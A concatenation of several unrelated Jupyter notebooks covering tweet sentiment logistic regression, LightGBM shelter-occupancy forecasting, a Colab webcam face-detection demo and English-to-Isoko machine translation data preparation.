Aim:* Extract features for logistic regression given some text* Implement logistic regression from scratch* Apply logistic regression on a natural language processing task* Test logistic regressionWe will be using a data set of tweets. Import functions and data
###Code
import nltk
from nltk.corpus import twitter_samples
import pandas as pd
nltk.download('twitter_samples')
nltk.download('stopwords')
import re
import string
import numpy as np
from nltk.corpus import stopwords
from nltk.stem import PorterStemmer
from nltk.tokenize import TweetTokenizer
#process_tweet(): cleans the text, tokenizes it into separate words, removes stopwords, and converts words to stems.
def process_tweet(tweet):
"""Process tweet function.
Input:
tweet: a string containing a tweet
Output:
tweets_clean: a list of words containing the processed tweet
"""
stemmer = PorterStemmer()
stopwords_english = stopwords.words('english')
# remove stock market tickers like $GE
tweet = re.sub(r'\$\w*', '', tweet)
# remove old style retweet text "RT"
tweet = re.sub(r'^RT[\s]+', '', tweet)
# remove hyperlinks
tweet = re.sub(r'https?:\/\/.*[\r\n]*', '', tweet)
# remove hashtags
# only removing the hash # sign from the word
tweet = re.sub(r'#', '', tweet)
# tokenize tweets
tokenizer = TweetTokenizer(preserve_case=False, strip_handles=True, reduce_len=True)
tweet_tokens = tokenizer.tokenize(tweet)
tweets_clean = []
for word in tweet_tokens:
#############################################################
# 1 remove stopwords
# 2 remove punctuation
# 3 stemming word
# 4 Add it to tweets_clean
if (word not in stopwords_english and word not in string.punctuation):
stem_word = stemmer.stem(word)
tweets_clean.append(stem_word)
return tweets_clean
#build_freqs counts how often a word in the 'corpus' (the entire set of tweets) was associated with
# a positive label '1' or
# a negative label '0',
#then builds the freqs dictionary, where each key is a (word,label) tuple,
#and the value is the count of its frequency within the corpus of tweets.
def build_freqs(tweets, ys):
"""Build frequencies.
Input:
tweets: a list of tweets
ys: an m x 1 array with the sentiment label of each tweet
(either 0 or 1)
Output:
freqs: a dictionary mapping each (word, sentiment) pair to its
frequency
"""
# Convert np array to list since zip needs an iterable.
# The squeeze is necessary or the list ends up with one element.
# Also note that this is just a NOP if ys is already a list.
yslist = np.squeeze(ys).tolist()
# Start with an empty dictionary and populate it by looping over all tweets
# and over all processed words in each tweet.
freqs = {}
for y, tweet in zip(yslist, tweets):
for word in process_tweet(tweet):
pair = (word, y)
#############################################################
#Update the count of pair if present, set it to 1 otherwise
if pair in freqs:
freqs[pair] += 1
else:
freqs[pair] = 1
return freqs
###Output
_____no_output_____
###Markdown
Prepare the data* The `twitter_samples` contains subsets of 5,000 positive tweets, 5,000 negative tweets, and the full set of 10,000 tweets.
###Code
# select the set of positive and negative tweets
all_positive_tweets = twitter_samples.strings('positive_tweets.json')
all_negative_tweets = twitter_samples.strings('negative_tweets.json')
###Output
_____no_output_____
###Markdown
* Train test split: 20% will be in the test set, and 80% in the training set.
###Code
# split the data into two pieces, one for training and one for testing
#############################################################
test_pos = all_positive_tweets[4000:]
train_pos = all_positive_tweets[:4000]
test_neg = all_negative_tweets[4000:]
train_neg = all_negative_tweets[:4000]
train_x = train_pos + train_neg
test_x = test_pos + test_neg
###Output
_____no_output_____
###Markdown
* Create the numpy array of positive labels and negative labels.
###Code
# combine positive and negative labels
train_y = np.append(np.ones((len(train_pos), 1)), np.zeros((len(train_neg), 1)), axis=0)
test_y = np.append(np.ones((len(test_pos), 1)), np.zeros((len(test_neg), 1)), axis=0)
###Output
_____no_output_____
###Markdown
* Create the frequency dictionary using the `build_freqs()` function.
###Code
# create frequency dictionary
#############################################################
freqs = build_freqs(train_x,train_y)
# check the output
print("type(freqs) = " + str(type(freqs)))
print("len(freqs) = " + str(len(freqs.keys())))
###Output
type(freqs) = <class 'dict'>
len(freqs) = 11339
###Markdown
* HERE, The `freqs` dictionary is the frequency dictionary that's being built. * The key is the tuple (word, label), such as ("happy",1) or ("happy",0). The value stored for each key is the count of how many times the word "happy" was associated with a positive label, or how many times "happy" was associated with a negative label. Process tweet
###Code
# Example
print('This is an example of a positive tweet: \n', train_x[0])
print('\nThis is an example of the processed version of the tweet: \n', process_tweet(train_x[0]))
###Output
This is an example of a positive tweet:
#FollowFriday @France_Inte @PKuchly57 @Milipol_Paris for being top engaged members in my community this week :)
This is an example of the processed version of the tweet:
['followfriday', 'top', 'engag', 'member', 'commun', 'week', ':)']
###Markdown
Logistic regression : Sigmoid$$ h(z) = \frac{1}{1+\exp^{-z}} $$It maps the input 'x' to a value that ranges between 0 and 1, and so it can be treated as a probability.
###Code
def sigmoid(z):
# calculate the sigmoid of z
#############################################################
h = 1/(1+np.exp(-z))
return h
###Output
_____no_output_____
###Markdown
Logistic regression: regression and a sigmoidLogistic regression takes a regular linear regression, and applies a sigmoid to the output of the linear regression.Logistic regression$$ h(z) = \frac{1}{1+\exp^{-z}}$$$$z = \theta_0 x_0 + \theta_1 x_1 + \theta_2 x_2 + ... \theta_N x_N$$ Update the weights:Gradient Descent$$\nabla_{\theta_j}J(\theta) = \frac{1}{m} \sum_{i=1}^m(h^{(i)}-y^{(i)})x_j $$* To update the weight $\theta_j$, we adjust it by subtracting a fraction of the gradient determined by $\alpha$:$$\theta_j = \theta_j - \alpha \times \nabla_{\theta_j}J(\theta) $$* The learning rate $\alpha$ is a value that we choose to control how big a single update will be.
###Code
def gradientDescent(x, y, theta, alpha, num_iters):
# get 'm', the number of rows in matrix x
m = len(x)
for i in range(0, num_iters):
# get z, the dot product of x and theta
#############################################################
z = np.dot(x,theta)
# get the sigmoid of z
#############################################################
h = sigmoid(z)
# calculate the cost function
J = (-1/m)*(y.T @ np.log(h) + (1-y).T @ np.log(1-h))
# update the weights theta
#############################################################
theta = theta - (alpha/m) * np.dot(x.transpose(),(h-y))
J = float(J)
return J, theta
###Output
_____no_output_____
###Markdown
Extracting the features* Given a list of tweets, extract the features and store them in a matrix. You will extract two features. * The first feature is the number of positive words in a tweet. * The second feature is the number of negative words in a tweet. * Then train your logistic regression classifier on these features.* Test the classifier on a validation set.
###Code
def extract_features(tweet, freqs):
'''
Input:
tweet: a list of words for one tweet
freqs: a dictionary corresponding to the frequencies of each tuple (word, label)
Output:
x: a feature vector of dimension (1,3)
'''
# tokenizes, stems, and removes stopwords
#############################################################
word_l = process_tweet(tweet)
# 3 elements in the form of a 1 x 3 vector
x = np.zeros((1, 3))
#bias term is set to 1
x[0,0] = 1
# loop through each word in the list of words
for word in word_l:
# increment the word count for the positive label 1
#############################################################
x[0,1] += freqs.get((word, 1.0),0)
# increment the word count for the negative label 0
#############################################################
x[0,2] += freqs.get((word, 0.0),0)
assert(x.shape == (1, 3))
return x
# Check the function
# test 1
# test on training data
tmp1 = extract_features(train_x[0], freqs)
print(tmp1)
# test 2:
# check for when the words are not in the freqs dictionary
tmp2 = extract_features('Hariom pandya', freqs)
print(tmp2)
###Output
[[1. 0. 0.]]
###Markdown
Training Your ModelTo train the model:* Stack the features for all training examples into a matrix `X`. * Call `gradientDescent`
###Code
# collect the features 'x' and stack them into a matrix 'X'
X = np.zeros((len(train_x), 3))
for i in range(len(train_x)):
X[i, :]= extract_features(train_x[i], freqs)
# training labels corresponding to X
Y = train_y
# Apply gradient descent
J, theta = gradientDescent(X, Y, np.zeros((3, 1)), 1e-9, 1500)
print(f"The cost after training is {J:.8f}.")
###Output
The cost after training is 0.24215613.
###Markdown
Test logistic regressionPredict whether a tweet is positive or negative.* Given a tweet, process it, then extract the features.* Apply the model's learned weights on the features to get the logits.* Apply the sigmoid to the logits to get the prediction (a value between 0 and 1).$$y_{pred} = sigmoid(\mathbf{x} \cdot \theta)$$
###Code
def predict_tweet(tweet, freqs, theta):
'''
Input:
tweet: a string
freqs: a dictionary corresponding to the frequencies of each tuple (word, label)
theta: (3,1) vector of weights
Output:
y_pred: the probability of a tweet being positive or negative
'''
# extract the features of the tweet and store it into x
#############################################################
x = extract_features(tweet,freqs)
# make the prediction using x and theta
#############################################################
y_pred = sigmoid(np.dot(x,theta))
return y_pred
# Run this cell to test your function
for tweet in ['I am happy', 'I am bad', 'this movie should have been great.', 'great', 'great great', 'great great great', 'great great great great']:
print( '%s -> %f' % (tweet, predict_tweet(tweet, freqs, theta)))
###Output
I am happy -> 0.518581
I am bad -> 0.494339
this movie should have been great. -> 0.515331
great -> 0.515464
great great -> 0.530899
great great great -> 0.546275
great great great great -> 0.561562
###Markdown
Check performance using the test set
###Code
def test_logistic_regression(test_x, test_y, freqs, theta):
"""
Input:
test_x: a list of tweets
test_y: (m, 1) vector with the corresponding labels for the list of tweets
freqs: a dictionary with the frequency of each pair (or tuple)
theta: weight vector of dimension (3, 1)
Output:
accuracy: (# of tweets classified correctly) / (total # of tweets)
"""
# the list for storing predictions
y_hat = []
for tweet in test_x:
# get the label prediction for the tweet
y_pred = predict_tweet(tweet, freqs, theta)
if y_pred > 0.5:
# append 1.0 to the list
y_hat.append(1)
else:
# append 0 to the list
y_hat.append(0)
# With the above implementation, y_hat is a list, but test_y is (m,1) array
# convert both to one-dimensional arrays in order to compare them using the '==' operator
count=0
y_hat=np.array(y_hat)
m=len(test_y)
#print(m)
test_y=np.reshape(test_y,m)
#print(y_hat.shape)
#print(test_y.shape)
accuracy = ((test_y == y_hat).sum())/m
return accuracy
tmp_accuracy = test_logistic_regression(test_x, test_y, freqs, theta)
print(f"Logistic regression model's accuracy = {tmp_accuracy:.4f}")
###Output
Logistic regression model's accuracy = 0.9950
|
Scripts/Multivariate analysis v3 - Forecast by gender.ipynb | ###Markdown
Loading Libraries
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import statsmodels.api as sm
from statsmodels.tsa.api import VAR
from sklearn.model_selection import train_test_split
import lightgbm as lgb
import seaborn as sns
###Output
_____no_output_____
###Markdown
Data Manipulation
###Code
#reading data
data = pd.read_csv("~/OneDrive/Documents/Datakind/DC DHS/Data/InShelterPerDayGender-10-16-2021.csv")
data['date'] = pd.to_datetime(data['date'])
#data['Total'] = data['Female'] + data['Male'] + data['NA'] + data['Transgender']
data['Total'] = data['Female']
#data = data[data['Total']!=0]
#data[['MinTempF','MaxTempF', 'SnowIn', 'PrecipIn', 'FreezingAtEntry', 'Total']] = data[['MinTempF','MaxTempF', 'SnowIn', 'PrecipIn', 'FreezingAtEntry', 'Total']].fillna(0)
#data = data.dropna()
data.head()
#filtering out data
data = data[~data['year'].isin([2005, 2021])]
###Output
_____no_output_____
###Markdown
Correlation Analysis
###Code
corrmat = data.corr(method = 'spearman')
f,ax = plt.subplots(figsize = (15,10))
sns.heatmap(abs(corrmat), ax = ax , cmap = 'YlGnBu', linewidth = 0.1)
###Output
_____no_output_____
###Markdown
Multivariate Analysis
###Code
# Create a TimeSeries, specifying the time and value columns
model_data = data[['date', 'Total', 'MinTempF', 'PrecipIn','FreezingAtEntry']].reset_index().fillna(0)
X_train, X_test, y_train, y_test = train_test_split(model_data[['date', 'MinTempF', 'PrecipIn','FreezingAtEntry']] ,model_data['Total'], test_size=0.33, shuffle=False)
# fitting model
params = {
'boosting_type': 'gbdt',
'objective': 'regression',
'metric': {'l2', 'l1'},
'learning_rate': 0.05,
'feature_fraction': 0.9,
'bagging_fraction': 0.8,
'bagging_freq': 5,
'verbose': 0,
'max_depth' : 5
}
lgb_train = lgb.Dataset(X_train[['MinTempF', 'PrecipIn','FreezingAtEntry']], y_train)
gbm = lgb.train(params,lgb_train,num_boost_round=500)
forecast = list(gbm.predict(X_train[['MinTempF', 'PrecipIn','FreezingAtEntry']], num_iteration=gbm.best_iteration))
final1 = pd.DataFrame()
final1['date'] = X_train['date']
final1['Total'] = y_train
final1 = final1.reset_index()
final1['Forecast'] = forecast
forecast = list(gbm.predict(X_test[['MinTempF', 'PrecipIn','FreezingAtEntry']], num_iteration=gbm.best_iteration))
final2 = pd.DataFrame()
final2['date'] = X_test['date']
final2['Total'] = y_test
final2 = final2.reset_index()
final2['Forecast'] = forecast
final = final1.append(final2)
final = final.reset_index()
lgb.plot_importance(gbm)
# plotting data
plt.figure(figsize=(15,8))
plt.plot(final.date, final.Total,label='Actual value')
plt.plot(final.date, final.Forecast,label='Forecast Value')
plt.legend()
plt.show()
###Output
_____no_output_____ |
notebooks/json-catalog.ipynb | ###Markdown
JSON Catalog
###Code
%load_ext autoreload
%autoreload 2
from cord.jsonpaper import JsonCatalog
from cord.core import BIORXIV_MEDRXIV
catalog = JsonCatalog.load(BIORXIV_MEDRXIV)
catalog
catalog[1000]
paper = catalog.get_paper('0015023cc06b5362d332b3baf348d11567ca2fbb')
paper
catalog['0015023cc06b5362d332b3baf348d11567ca2fbb']
###Output
_____no_output_____ |
templates/template.ipynb | ###Markdown
Title Description goes here Prerequisites: None
###Code
# Code explaining things go here
Use Cases: None
Documentation Link: None
Video Link: None
###Output
_____no_output_____
###Markdown
 Programar y Reprogramar Recursos para Docentes Fecha: 29 Octubre 2021, 13:00 a 15:00 Sofía Martin, Ariel Ramos, Liliana Hurtado, Sebastián Flores Este texto es markdown. Puedes hacer doble click para editar, y Alt-Enter para mostrar.
###Code
# Este es código en python
print(u"Jelou \U0001F30E")
###Output
Jelou 🌎
|
webcam.ipynb | ###Markdown
Google Colab: Access Webcam for Images and VideoThis notebook will go through how to access and run code on images and video taken using your webcam. For this purpose of this tutorial we will be using OpenCV's Haar Cascade to do face detection on our Webcam image and video.
###Code
# import dependencies
from IPython.display import display, Javascript, Image
from google.colab.output import eval_js
from base64 import b64decode, b64encode
import cv2
import numpy as np
import PIL
import io
import html
import time
###Output
_____no_output_____
###Markdown
Helper FunctionsBelow are a few helper function to make converting between different image data types and formats.
###Code
# function to convert the JavaScript object into an OpenCV image
def js_to_image(js_reply):
"""
Params:
js_reply: JavaScript object containing image from webcam
Returns:
img: OpenCV BGR image
"""
# decode base64 image
image_bytes = b64decode(js_reply.split(',')[1])
# convert bytes to numpy array
jpg_as_np = np.frombuffer(image_bytes, dtype=np.uint8)
# decode numpy array into OpenCV BGR image
img = cv2.imdecode(jpg_as_np, flags=1)
return img
# function to convert OpenCV Rectangle bounding box image into base64 byte string to be overlayed on video stream
def bbox_to_bytes(bbox_array):
"""
Params:
bbox_array: Numpy array (pixels) containing rectangle to overlay on video stream.
Returns:
bytes: Base64 image byte string
"""
# convert array into PIL image
bbox_PIL = PIL.Image.fromarray(bbox_array, 'RGBA')
iobuf = io.BytesIO()
# format bbox into png for return
bbox_PIL.save(iobuf, format='png')
# format return string
bbox_bytes = 'data:image/png;base64,{}'.format((str(b64encode(iobuf.getvalue()), 'utf-8')))
return bbox_bytes
###Output
_____no_output_____
###Markdown
Haar Cascade ClassifierFor this tutorial we will run a simple object detection algorithm called Haar Cascade on our images and video fetched from our webcam. OpenCV has a pre-trained Haar Cascade face detection model.
###Code
# initialize the Haar Cascade face detection model
face_cascade = cv2.CascadeClassifier(cv2.samples.findFile(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml'))
###Output
_____no_output_____
###Markdown
Webcam ImagesRunning code on images taken from webcam is fairly straight-forward. We will utilize code within Google Colab's **Code Snippets** that has a variety of useful code functions to perform various tasks.We will be using the code snippet for **Camera Capture** to utilize your computer's webcam.
###Code
def take_photo(filename='photo.jpg', quality=0.8):
js = Javascript('''
async function takePhoto(quality) {
const div = document.createElement('div');
const capture = document.createElement('button');
capture.textContent = 'Capture';
div.appendChild(capture);
const video = document.createElement('video');
video.style.display = 'block';
const stream = await navigator.mediaDevices.getUserMedia({video: true});
document.body.appendChild(div);
div.appendChild(video);
video.srcObject = stream;
await video.play();
// Resize the output to fit the video element.
google.colab.output.setIframeHeight(document.documentElement.scrollHeight, true);
// Wait for Capture to be clicked.
await new Promise((resolve) => capture.onclick = resolve);
const canvas = document.createElement('canvas');
canvas.width = video.videoWidth;
canvas.height = video.videoHeight;
canvas.getContext('2d').drawImage(video, 0, 0);
stream.getVideoTracks()[0].stop();
div.remove();
return canvas.toDataURL('image/jpeg', quality);
}
''')
display(js)
# get photo data
data = eval_js('takePhoto({})'.format(quality))
# get OpenCV format image
img = js_to_image(data)
# grayscale img
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
print(gray.shape)
# get face bounding box coordinates using Haar Cascade
faces = face_cascade.detectMultiScale(gray)
# draw face bounding box on image
for (x,y,w,h) in faces:
img = cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
# save image
cv2.imwrite(filename, img)
return filename
try:
filename = take_photo('photo.jpg')
print('Saved to {}'.format(filename))
# Show the image which was just taken.
display(Image(filename))
except Exception as err:
# Errors will be thrown if the user does not have a webcam or if they do not
# grant the page permission to access it.
print(str(err))
###Output
_____no_output_____
###Markdown
Webcam VideosRunning code on webcam video is a little more complex than images. We need to start a video stream using our webcam as input. Then we run each frame through our progam (face detection) and create an overlay image that contains bounding box of detection(s). We then overlay the bounding box image back onto the next frame of our video stream.
###Code
# JavaScript to properly create our live video stream using our webcam as input
def video_stream():
js = Javascript('''
var video;
var div = null;
var stream;
var captureCanvas;
var imgElement;
var labelElement;
var pendingResolve = null;
var shutdown = false;
function removeDom() {
stream.getVideoTracks()[0].stop();
video.remove();
div.remove();
video = null;
div = null;
stream = null;
imgElement = null;
captureCanvas = null;
labelElement = null;
}
function onAnimationFrame() {
if (!shutdown) {
window.requestAnimationFrame(onAnimationFrame);
}
if (pendingResolve) {
var result = "";
if (!shutdown) {
captureCanvas.getContext('2d').drawImage(video, 0, 0, 640, 480);
result = captureCanvas.toDataURL('image/jpeg', 0.8)
}
var lp = pendingResolve;
pendingResolve = null;
lp(result);
}
}
async function createDom() {
if (div !== null) {
return stream;
}
div = document.createElement('div');
div.style.border = '2px solid black';
div.style.padding = '3px';
div.style.width = '100%';
div.style.maxWidth = '600px';
document.body.appendChild(div);
const modelOut = document.createElement('div');
modelOut.innerHTML = "<span>Status:</span>";
labelElement = document.createElement('span');
labelElement.innerText = 'No data';
labelElement.style.fontWeight = 'bold';
modelOut.appendChild(labelElement);
div.appendChild(modelOut);
video = document.createElement('video');
video.style.display = 'block';
video.width = div.clientWidth - 6;
video.setAttribute('playsinline', '');
video.onclick = () => { shutdown = true; };
stream = await navigator.mediaDevices.getUserMedia(
{video: { facingMode: "environment"}});
div.appendChild(video);
imgElement = document.createElement('img');
imgElement.style.position = 'absolute';
imgElement.style.zIndex = 1;
imgElement.onclick = () => { shutdown = true; };
div.appendChild(imgElement);
const instruction = document.createElement('div');
instruction.innerHTML =
'<span style="color: red; font-weight: bold;">' +
'When finished, click here or on the video to stop this demo</span>';
div.appendChild(instruction);
instruction.onclick = () => { shutdown = true; };
video.srcObject = stream;
await video.play();
captureCanvas = document.createElement('canvas');
captureCanvas.width = 640; //video.videoWidth;
captureCanvas.height = 480; //video.videoHeight;
window.requestAnimationFrame(onAnimationFrame);
return stream;
}
async function stream_frame(label, imgData) {
if (shutdown) {
removeDom();
shutdown = false;
return '';
}
var preCreate = Date.now();
stream = await createDom();
var preShow = Date.now();
if (label != "") {
labelElement.innerHTML = label;
}
if (imgData != "") {
var videoRect = video.getClientRects()[0];
imgElement.style.top = videoRect.top + "px";
imgElement.style.left = videoRect.left + "px";
imgElement.style.width = videoRect.width + "px";
imgElement.style.height = videoRect.height + "px";
imgElement.src = imgData;
}
var preCapture = Date.now();
var result = await new Promise(function(resolve, reject) {
pendingResolve = resolve;
});
shutdown = false;
return {'create': preShow - preCreate,
'show': preCapture - preShow,
'capture': Date.now() - preCapture,
'img': result};
}
''')
display(js)
def video_frame(label, bbox):
data = eval_js('stream_frame("{}", "{}")'.format(label, bbox))
return data
# start streaming video from webcam
video_stream()
# label for video
label_html = 'Capturing...'
# initialze bounding box to empty
bbox = ''
count = 0
while True:
js_reply = video_frame(label_html, bbox)
if not js_reply:
break
# convert JS response to OpenCV Image
img = js_to_image(js_reply["img"])
# create transparent overlay for bounding box
bbox_array = np.zeros([480,640,4], dtype=np.uint8)
# grayscale image for face detection
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# get face region coordinates
faces = face_cascade.detectMultiScale(gray)
# get face bounding box for overlay
for (x,y,w,h) in faces:
bbox_array = cv2.rectangle(bbox_array,(x,y),(x+w,y+h),(255,0,0),2)
bbox_array[:,:,3] = (bbox_array.max(axis = 2) > 0 ).astype(int) * 255
# convert overlay of bbox into bytes
bbox_bytes = bbox_to_bytes(bbox_array)
# update bbox so next frame gets new overlay
bbox = bbox_bytes
###Output
_____no_output_____ |
benchmarks/en-iso/jw300-baseline/English_to_Isoko_BPE_notebook.ipynb | ###Markdown
Masakhane - Machine Translation for African Languages (Using JoeyNMT) Note before beginning: - The idea is that you should be able to make minimal changes to this in order to get SOME result for your own translation corpus. - The tl;dr: Go to the **"TODO"** comments which will tell you what to update to get up and running - If you actually want to have a clue what you're doing, read the text and peek at the links - With 100 epochs, it should take around 7 hours to run in Google Colab - Once you've gotten a result for your language, please attach and email your notebook that generated it to [email protected] - If you care enough and get a chance, doing a brief background on your language would be amazing. See examples in [(Martinus, 2019)](https://arxiv.org/abs/1906.05685) Retrieve your data & make a parallel corpusIf you are wanting to use the JW300 data referenced on the Masakhane website or in our GitHub repo, you can use `opus-tools` to convert the data into a convenient format. `opus_read` from that package provides a convenient tool for reading the native aligned XML files and to convert them to TMX format. The tool can also be used to fetch relevant files from OPUS on the fly and to filter the data as necessary. [Read the documentation](https://pypi.org/project/opustools-pkg/) for more details.Once you have your corpus files in TMX format (an xml structure which will include the sentences in your target language and your source language in a single file), we recommend reading them into a pandas dataframe. Thankfully, Jade wrote a silly `tmx2dataframe` package which converts your tmx file to a pandas dataframe.
###Code
from google.colab import drive
drive.mount('/content/drive')
# TODO: Set your source and target languages. Keep in mind, these traditionally use language codes as found here:
# These will also become the suffix's of all vocab and corpus files used throughout
import os
source_language = "en"
target_language = "iso"
lc = False # If True, lowercase the data.
seed = 42 # Random seed for shuffling.
tag = "baseline" # Give a unique name to your folder - this is to ensure you don't rewrite any models you've already submitted
os.environ["src"] = source_language # Sets them in bash as well, since we often use bash scripts
os.environ["tgt"] = target_language
os.environ["tag"] = tag
# This will save it to a folder in our gdrive instead!
!mkdir -p "/content/drive/My Drive/masakhane/$src-$tgt-$tag"
os.environ["gdrive_path"] = "/content/drive/My Drive/masakhane/%s-%s-%s" % (source_language, target_language, tag)
!echo $gdrive_path
# Install opus-tools
! pip install opustools-pkg
# Downloading our corpus
! opus_read -d JW300 -s $src -t $tgt -wm moses -w jw300.$src jw300.$tgt -q
# extract the corpus file
! gunzip JW300_latest_xml_$src-$tgt.xml.gz
# Download the global test set.
! wget https://raw.githubusercontent.com/juliakreutzer/masakhane/master/jw300_utils/test/test.en-any.en
# And the specific test set for this language pair.
os.environ["trg"] = target_language
os.environ["src"] = source_language
! wget https://raw.githubusercontent.com/juliakreutzer/masakhane/master/jw300_utils/test/test.en-$trg.en
! mv test.en-$trg.en test.en
! wget https://raw.githubusercontent.com/juliakreutzer/masakhane/master/jw300_utils/test/test.en-$trg.$trg
! mv test.en-$trg.$trg test.$trg
# Read the test data to filter from train and dev splits.
# Store english portion in set for quick filtering checks.
en_test_sents = set()
filter_test_sents = "test.en-any.en"
j = 0
with open(filter_test_sents) as f:
for line in f:
en_test_sents.add(line.strip())
j += 1
print('Loaded {} global test sentences to filter from the training/dev data.'.format(j))
import pandas as pd
# TMX file to dataframe
source_file = 'jw300.' + source_language
target_file = 'jw300.' + target_language
source = []
target = []
skip_lines = [] # Collect the line numbers of the source portion to skip the same lines for the target portion.
with open(source_file) as f:
for i, line in enumerate(f):
# Skip sentences that are contained in the test set.
if line.strip() not in en_test_sents:
source.append(line.strip())
else:
skip_lines.append(i)
with open(target_file) as f:
for j, line in enumerate(f):
# Only add to corpus if corresponding source was not skipped.
if j not in skip_lines:
target.append(line.strip())
print('Loaded data and skipped {}/{} lines since contained in test set.'.format(len(skip_lines), i))
df = pd.DataFrame(zip(source, target), columns=['source_sentence', 'target_sentence'])
# if you get TypeError: data argument can't be an iterator is because of your zip version run this below
#df = pd.DataFrame(list(zip(source, target)), columns=['source_sentence', 'target_sentence'])
df.head(3)
###Output
Loaded data and skipped 5685/243487 lines since contained in test set.
###Markdown
Pre-processing and exportIt is generally a good idea to remove duplicate translations and conflicting translations from the corpus. In practice, these public corpora include some number of these that need to be cleaned.In addition we will split our data into dev/test/train and export to the filesystem.
###Code
# drop duplicate translations
df_pp = df.drop_duplicates()
# drop conflicting translations
# (this is optional and something that you might want to comment out
# depending on the size of your corpus)
df_pp.drop_duplicates(subset='source_sentence', inplace=True)
df_pp.drop_duplicates(subset='target_sentence', inplace=True)
# Shuffle the data to remove bias in dev set selection.
df_pp = df_pp.sample(frac=1, random_state=seed).reset_index(drop=True)
# Install fuzzy wuzzy to remove "almost duplicate" sentences in the
# test and training sets.
! pip install fuzzywuzzy
! pip install python-Levenshtein
import time
from fuzzywuzzy import process
import numpy as np
# reset the index of the training set after previous filtering
df_pp.reset_index(drop=False, inplace=True)
# Remove samples from the training data set if they "almost overlap" with the
# samples in the test set.
# Filtering function. Adjust pad to narrow down the candidate matches to
# within a certain length of characters of the given sample.
def fuzzfilter(sample, candidates, pad):
candidates = [x for x in candidates if len(x) <= len(sample)+pad and len(x) >= len(sample)-pad]
if len(candidates) > 0:
return process.extractOne(sample, candidates)[1]
else:
return np.nan
# NOTE - This might run slow depending on the size of your training set. We are
# printing some information to help you track how long it would take.
scores = []
start_time = time.time()
for idx, row in df_pp.iterrows():
scores.append(fuzzfilter(row['source_sentence'], list(en_test_sents), 5))
if idx % 1000 == 0:
hours, rem = divmod(time.time() - start_time, 3600)
minutes, seconds = divmod(rem, 60)
print("{:0>2}:{:0>2}:{:05.2f}".format(int(hours),int(minutes),seconds), "%0.2f percent complete" % (100.0*float(idx)/float(len(df_pp))))
# Filter out "almost overlapping samples"
df_pp['scores'] = scores
df_pp = df_pp[df_pp['scores'] < 95]
# This section does the split between train/dev for the parallel corpora then saves them as separate files
# We use 1000 dev test and the given test set.
import csv
# Do the split between dev/train and create parallel corpora
num_dev_patterns = 1000
# Optional: lower case the corpora - this will make it easier to generalize, but without proper casing.
if lc: # Julia: making lowercasing optional
df_pp["source_sentence"] = df_pp["source_sentence"].str.lower()
df_pp["target_sentence"] = df_pp["target_sentence"].str.lower()
# Julia: test sets are already generated
dev = df_pp.tail(num_dev_patterns) # Herman: Error in original
stripped = df_pp.drop(df_pp.tail(num_dev_patterns).index)
with open("train."+source_language, "w") as src_file, open("train."+target_language, "w") as trg_file:
for index, row in stripped.iterrows():
src_file.write(row["source_sentence"]+"\n")
trg_file.write(row["target_sentence"]+"\n")
with open("dev."+source_language, "w") as src_file, open("dev."+target_language, "w") as trg_file:
for index, row in dev.iterrows():
src_file.write(row["source_sentence"]+"\n")
trg_file.write(row["target_sentence"]+"\n")
#stripped[["source_sentence"]].to_csv("train."+source_language, header=False, index=False) # Herman: Added `header=False` everywhere
#stripped[["target_sentence"]].to_csv("train."+target_language, header=False, index=False) # Julia: Problematic handling of quotation marks.
#dev[["source_sentence"]].to_csv("dev."+source_language, header=False, index=False)
#dev[["target_sentence"]].to_csv("dev."+target_language, header=False, index=False)
# Doublecheck the format below. There should be no extra quotation marks or weird characters.
! head train.*
! head dev.*
###Output
==> train.en <==
Now in his 80 ’ s , John admits that at times he feels despondent .
The Bible exhorts us to “ speak consolingly to the depressed souls , support the weak . ”
Those words of 17th - century British historian Edward Herbert underscore one reason why we need to be forgiving toward others : Sooner or later , we may need to ask others to forgive us .
So why not prove to yourself that what you have been taught from the Bible is indeed the truth ?
Father , glorify your name . ’
God’s Word foretold this development , saying : “ There will be a period of time when they [ people professing to serve God ] will not put up with the healthful teaching , but , in accord with their own desires , they will accumulate teachers for themselves to have their ears tickled . ”
We get water from a well at the police station .
Do we courageously identify ourselves as Jehovah’s Witnesses , even though doing so may mean persecution ?
Tatiana , a full - time evangelizer in Kamchatka , a Russian peninsula located northeast of Japan , began saving for the trip a year in advance .
Since 1939 , the cover of each issue of The Watchtower magazine has displayed the words “ Announcing Jehovah’s Kingdom . ”
==> train.iso <==
Enẹna Jọn ọ kpako te ikpe udhone gbọ no , ọ ta nọ ẹsejọ ọ be hai wo elọhoma .
Ebaibol na e ta udu họ omai awọ nnọ “ wha ta udu họ enọ udu u re bro awọ , wha fiobọhọ kẹ enọ e ko . ”
Eme yena nọ ogbiku yena ọ ta anwọ ikpe udhusoi akwa ane ( 400 ) nọ i kpemu na , i dhesẹ epanọ u wuzou te re ma rọ vrẹ amọfa , keme ma te siọ amọfa ba eruthọ ẹdẹjọ họ , nọ o te gwọlọ nọ a rọ vrẹ omai .
Kiẹ kẹ oma ra re u mu owhẹ ẹro inọ eware nọ a wuhrẹ owhẹ no Ebaibol ze na ginọ uzẹme .
Koyehọ uru jọ u te no eva ehru ze nọ , ‘ Mẹ kẹ riẹ oro uno , mẹ jẹ te wariẹ kẹ e oro . ’
A jọ Ebaibol ruẹaro kpahe onana , inọ : “ Oke o be tha nọ ahwo [ enọ i se oma rai eg’Ọghẹnẹ ] a rẹ te rehọ uwuhrẹ nọ o gbunu hu , [ rekọ ] ezọ e rẹ te sae okpọ a ve ti koko iwuhrẹ nọ i re ti wuhrẹ ai onọ a guọlọ . ”
Ozae nọ o rrọ ogba iporisi ma re kpohọ jo vo ame .
Kọ ma be hae gbaudu dhesẹ oma wọhọ Isẹri Jihova , o tẹ make rọnọ ere oruo o rẹ sae wha ukpokpoma ze ?
Tatiana , ọtausiuwoma oke - kpobi nọ o no Kamchatka ze , ẹwho Russia jọ nọ ọ rrọ ofẹ obọze ẹkpẹlobọ ovatha - ọre ọrọ Japan , o muọ ugho họ ekoko họ kẹ erẹ na ukpe soso taure oke na u te ti te .
Anwọ ukpe 1939 ze , uzoẹme nọ o rrọ uke emagazini Uwou - Eroro Na họ “ Uwou - Eroro Na Nọ U Bi Whowho Uvie Jihova . ”
==> dev.en <==
We can even ask God to ‘ create in us a pure heart . ’
This was followed by Kingdom News No .
